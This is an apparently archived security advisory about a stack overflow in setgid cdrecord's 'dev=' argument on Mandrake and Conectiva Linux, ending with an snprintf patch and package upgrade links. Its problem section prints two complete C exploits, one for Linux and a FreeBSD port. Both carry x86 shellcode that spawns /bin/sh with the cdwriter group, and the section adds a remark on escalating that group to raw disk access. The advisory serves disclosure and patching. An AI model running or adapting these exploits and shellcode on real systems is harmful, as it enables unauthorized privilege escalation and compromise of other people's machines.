COMMAND

    /usr/bin/cdrecord

SYSTEMS AFFECTED

    Mandrake 6.1, 7.0, Conectiva Linux 5.0

PROBLEM

    'noir' found the following.  On the affected systems cdrecord is
    installed setgid to group "cdwriter" (gid 80), and it overflows  a
    fixed-size  stack  buffer  when  given  an  over-long "dev="  argument
    (the  bounded-copy  fix  is  shown  in  the  SOLUTION  section).   You
    may say gid=80 (cdwriter) is useless, but see the note after the
    exploit about raw SCSI device access; anyway, here is the exploit:

    /*  /usr/bin/cdrecord exploit by noir
     *  x86/Linux
     *  noir@gsu.linux.org.tr | noir@olympos.org
     *  dev= param overflow
     *  this script will get you gid = 80 group cdwriter
     *  tested on Mandrake 7.0 (Air)
     *  greetz: dustdevil, Cronos, moog, still, BlaCK #olympos irc.sourtimes.org
     *
     *
     */

    #include <errno.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    /* Single-byte x86 "nop": fills the EGG sled so that landing anywhere in
     * the sled slides execution forward into the shellcode. */
    #define NOP             0x90
    /* Guessed stack address inside the EGG sled on the tested target
     * (Mandrake 7.0); written over the saved return address.  Play with
     * argv[1] (+10, -10) if the default is not ok -- the value is
     * subtracted from RET at run time. */
    #define RET     0xbffffe66
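    int
    main(int argc, char *argv[])
    {
            /*
             * Proof of concept for the cdrecord "dev=" stack overflow on
             * x86/Linux (cdrecord installed setgid, group cdwriter = gid 80).
             *
             * Two pieces are handed to the setgid binary:
             *   EGG  - environment variable: a NOP sled with the shellcode
             *          (setregid(80,80), then execve("/bin/sh")) at offset 300;
             *   buf  - the dev= value: the guessed address RET repeated back
             *          to back and cut to 72 bytes, so that the copy into
             *          cdrecord's fixed-size buffer overwrites the saved
             *          return address with an address inside the sled.
             *
             * argv[1] (optional): decimal value subtracted from RET so the
             * guess can be adjusted without recompiling ("play with +10/-10").
             * Returns 1 on a bad argument or if setenv()/execl() fails; on
             * success execl() does not return.
             *
             * The address is written as 4-byte words because the target is
             * 32-bit x86; this also keeps every write inside buf should the
             * file ever be built where sizeof(long) == 8.
             */
            unsigned char shell[] =
            "\x31\xc0\xb0\x50\x89\xc3\x89\xc1\xb0\x47\xcd\x80"  /* setregid(80, 80) */
            "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
            "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
            "\x80\xe8\xdc\xff\xff\xff/bin/sh";
            /* sizeof - 1 drops the literal's terminating NUL; the shellcode
             * itself contains no NUL byte, so this equals strlen() of it
             * (57 bytes) without the unsigned-char/char pointer mismatch. */
            const size_t shell_len = sizeof shell - 1;
            enum { EGG_LEN = 400, BUF_LEN = 80, SHELL_AT = 300, BUF_CUT = 72 };
            char egg[EGG_LEN];
            char buf[BUF_LEN];
            long ret = RET;
            unsigned int word;
            size_t i;

            if (argc > 1) {
                    char *end;
                    long delta;

                    errno = 0;
                    delta = strtol(argv[1], &end, 10);
                    if (end == argv[1] || *end != '\0' || errno == ERANGE) {
                            fprintf(stderr, "bad offset: %s\n", argv[1]);
                            return 1;
                    }
                    ret -= delta;
            }

            /* buf: 20 copies of the return address, then cut at 72 bytes. */
            word = (unsigned int)ret;
            for (i = 0; i + sizeof word <= BUF_LEN; i += sizeof word)
                    memcpy(&buf[i], &word, sizeof word);
            buf[BUF_CUT] = '\0';

            /* egg: NOP sled, shellcode at SHELL_AT (300 + 57 < 399), and a
             * NUL at the very end so setenv() sees a proper C string. */
            memset(egg, NOP, sizeof egg);
            memcpy(&egg[SHELL_AT], shell, shell_len);
            egg[EGG_LEN - 1] = '\0';

            printf("eip: 0x%lx\n", (unsigned long)ret);

            if (setenv("EGG", egg, 1) != 0) {
                    perror("setenv");
                    return 1;
            }
            /* The varargs list must end with a null pointer, not int 0. */
            execl("/usr/bin/cdrecord", "cdrecord", "dev=", buf, "/etc/passwd",
                  (char *)NULL);
            perror("execl");
            return 1;
    }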

    If you have cdwriter (gid 80) access and the machine's hard disk  is
    on the SCSI bus, the group's access to the SCSI device  nodes  can
    presumably be turned into raw read/write access to the  disk's
    partitions -- i.e. a full compromise that bypasses file permissions
    entirely (no need to go into depth on what that means).

    Below is a port for FreeBSD.  It only works if cdrecord is installed
    setuid/setgid on your FreeBSD system, which is not the default:

    /* freebsd cdrecord exploit port by sectorx of XOR
    (http://xorteam.cjb.net) */

    #include <errno.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    /* Size of the overflowing dev= value: 19 copies of the return address,
     * NUL-terminated at byte 75. */
    #define LENGTH 76
    /* Size of the EGG environment variable: a NOP sled with the shellcode
     * placed flush against its end. */
    #define EGGIE 500

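    /* Returns the current stack pointer (low 32 bits), used as the base for
     * the return-address guess; the exact value depends on the compiler's
     * frame layout, which is what the argv[1] offset compensates for.
     * The original left the value in %eax with no return statement, which
     * is undefined behaviour in C; this returns it explicitly.  x86 only. */
    long esp(void)
    {
        unsigned int sp;

        __asm__ __volatile__("movl %%esp, %0" : "=r"(sp));
        return (long)sp;
    }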
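    /* FreeBSD/x86 execve("/bin/sh") shellcode, defined after main() below;
     * declared extern rather than as a tentative definition of incomplete
     * array type. */
    extern char devilspawn[];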

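    int main(int argc, char *argv[])
    {
        /*
         * FreeBSD port of the cdrecord "dev=" overflow (x86; cdrecord must be
         * installed setuid/setgid for this to gain anything).
         *
         * argv[1] (required): decimal offset added to the current stack
         * pointer to form the return address; the original note gives 600
         * for FreeBSD 3.3-RELEASE.  Builds buf (LENGTH bytes of that address,
         * NUL-terminated) as the dev= value and EGG (a NOP sled ending in the
         * devilspawn shellcode) in the environment, then execs
         * /usr/local/bin/cdrecord.  Returns 1 on a usage error or if
         * setenv()/execl() fails; on success execl() does not return.
         *
         * The address is written as 4-byte words because the target is
         * 32-bit; this also keeps the writes inside buf if the file is built
         * where sizeof(long) == 8.
         */
        long addr;
        long offset;
        char buf[LENGTH];
        char egg[EGGIE];
        size_t i, len;
        unsigned int word;
        char *end;

        printf("cdrecord exploit by sectorx (FreeBSD)\n");
        if (argc < 2) {
            printf("error: offset must be supplied as a parameter\n");
            printf("*note* FreeBSD 3.3-RELEASE's offset is 600\n\n");
            return 1;
        }
        errno = 0;
        offset = strtol(argv[1], &end, 10);
        if (end == argv[1] || *end != '\0' || errno == ERANGE) {
            printf("error: offset must be a decimal number\n");
            return 1;
        }
        addr = esp() + offset;
        printf("Using offset 0x%lx [%ld], eip = 0x%lx\n",
               (unsigned long)offset, offset, (unsigned long)addr);

        /* build the overflow string: LENGTH/4 copies of addr, NUL-terminated */
        word = (unsigned int)addr;
        for (i = 0; i + sizeof word <= LENGTH; i += sizeof word)
            memcpy(&buf[i], &word, sizeof word);
        buf[LENGTH - 1] = '\0';

        /* build the egg string: NOP sled, shellcode flush against the end */
        len = strlen(devilspawn);
        if (len + 1 > EGGIE) {
            printf("error: shellcode does not fit in the egg\n");
            return 1;
        }
        memset(egg, 0x90, sizeof egg);
        memcpy(egg + (EGGIE - len - 1), devilspawn, len);
        egg[EGGIE - 1] = '\0';

        if (setenv("EGG", egg, 1) != 0) {
            perror("setenv");
            return 1;
        }
        /* The varargs list must end with a null pointer, not int 0. */
        execl("/usr/local/bin/cdrecord", "cdrecord-bin", "dev=", buf,
              "/etc/fstab", (char *)NULL);
        perror("execl");
        return 1;
    }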
    /* FreeBSD shellcode by mudge of L0pht: execve("/bin/sh") on FreeBSD/x86.
     * It contains no NUL byte, so it survives the strlen()/setenv() copy
     * into EGG.  The ">:)(:<" characters are the operands of the lcall
     * (0x9a) that follows; the stores through %esi at the start appear to
     * rewrite them at run time into "lcall $7,$0", the FreeBSD syscall
     * gate, and the mov/xor pair into %eax yields 0x3b (execve).
     * NOTE(review): decoded by hand from the bytes -- verify before relying
     * on it. */
    char devilspawn[]=
    "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
    "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
    "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
       "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";

SOLUTION

    The person who originally reported this was only using the "medium"
    security level.  Under Linux-Mandrake, security levels 4/5  involve
    a filesystem scan and possibly a chmod, independent  of  individual
    programs in most cases.  However, the exploit works just  fine  on
    security levels 3/4/5 as well -- cdrecord is still gid=80 there --
    so the security level is not relevant.  The actual fix is the patch
    below: the unbounded sprintf() into the fixed-size device-name
    buffer is replaced by an snprintf() bounded by the buffer's size.

    --- cdrecord-1.8.1.orig/cdrecord/defaults.c	Sun Apr 16 02:08:58 2000
    +++ cdrecord-1.8.1/cdrecord/defaults.c	Tue May 30 13:30:45 2000
    @@ -109,7 +109,7 @@
  			    return;
  		    x++;
  	    }
     -	sprintf(dname, "%s=", p);
     +	snprintf(dname, sizeof(dname), "%s=", p);

    Please upgrade to:

        package: 7.0/RPMS/cdrecord-1.8.1-4mdk.i586.rpm
        package: 7.0/RPMS/cdrecord-cdda2wav-1.8.1-4mdk.i586.rpm
        package: 7.0/RPMS/cdrecord-devel-1.8.1-4mdk.i586.rpm
        package: 7.0/RPMS/mkisofs-1.12.1-4mdk.i586.rpm
        source package: 7.0/SRPMS/cdrecord-1.8.1-4mdk.src.rpm

    To upgrade automatically, use MandrakeUpdate.  If you want to upgrade
    manually, download the updated package from one of the FTP  server
    mirrors and upgrade with "rpm -Uvh package_name".  All mirrors  are
    listed on http://www.mandrake.com/en/ftp.php3

    Direct download links to updated Conectiva Linux packages:

        ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/5.0/i386/cdda2wav-1.8-2cl.i386.rpm
        ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/5.0/i386/cdrecord-1.8-2cl.i386.rpm
        ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/5.0/i386/cdrecord-devel-1.8-2cl.i386.rpm
        ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/5.0/i386/mkisofs-1.8-2cl.i386.rpm

        ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/5.0/SRPMS/cdda2wav-1.8-2cl.src.rpm
        ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/5.0/SRPMS/cdrecord-1.8-2cl.src.rpm
        ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/5.0/SRPMS/cdrecord-devel-1.8-2cl.src.rpm
        ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/5.0/SRPMS/mkisofs-1.8-2cl.src.rpm

    For Linux-Mandrake:

        7.1/RPMS/cdrecord-1.8.1-4mdk.i586.rpm